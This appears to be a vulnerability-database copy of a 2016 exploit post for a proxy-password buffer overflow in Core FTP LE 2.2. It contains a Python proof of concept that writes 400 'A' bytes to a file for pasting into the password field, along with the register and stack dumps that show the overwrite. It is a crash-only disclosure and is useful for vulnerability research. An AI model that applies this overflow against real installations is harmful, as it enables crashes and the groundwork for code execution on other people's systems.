Lucene search
+L

Core FTP Le 2.2 Buffer Overflow

🗓️ 11 Jul 2016 00:00:00Reported by s0nk3yType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 18 Views

Core FTP Le v2.2 Buffer Overflow, Proxy Passwor

Code
`#!/usr/bin/env python  
'''  
# Exploit Title: Core FTP Le v2.2 - Proxy Password Buffer Overflow  
# Date: 2016-7-11  
# Author: s0nk3y  
# Software Link: ftp://ftp.coreftp.com/coreftplite.exe  
# Version: 2.2  
# Tested on: Windows XP  
# CVE: N/A  
# Type: Buffer Overflow  
  
[+] Proof of concept  
Click options (Global Settings) -> Proxy -> enter the password and input "A"*400 -> Ok   
  
[+] Registers Detail:  
EAX 0012CF54 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...  
ECX 41414145  
EDX 0012CE64  
EBX 41414145  
ESP 0012CB1C  
EBP 0012D0C4 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"  
ESI 41414141  
EDI 0012CF54 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...  
EIP 004A1523 coreftp.004A1523  
'''  
  
buffer = "A" * 400  
exploit = open("exploit.txt","w")  
exploit.write(buffer)  
exploit.close  
  
'''  
[+] Stack:  
0012CCEC 00000003 ...  
0012CCF0 00498BFE þ‹I. RETURN to coreftp.00498BFE from coreftp.004A1520  
0012CCF4 0012D124 $Ñ. ASCII "AAAAAAAAAAAAA...  
0012CCF8 0012D034 4Ð.  
0012CCFC 41414141 AAAA  
0012CD00 00000000 ....  
0012CD04 41414141 AAAA  
0012CD08 41414141 AAAA  
0012CD0C 41414141 AAAA  
0012CD10 41414141 AAAA  
0012CD14 41414141 AAAA  
0012CD18 41414141 AAAA  
0012CD1C 41414141 AAAA  
....  
'''  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 Jul 2016 00:00Current
1Low risk
Vulners AI Score1
18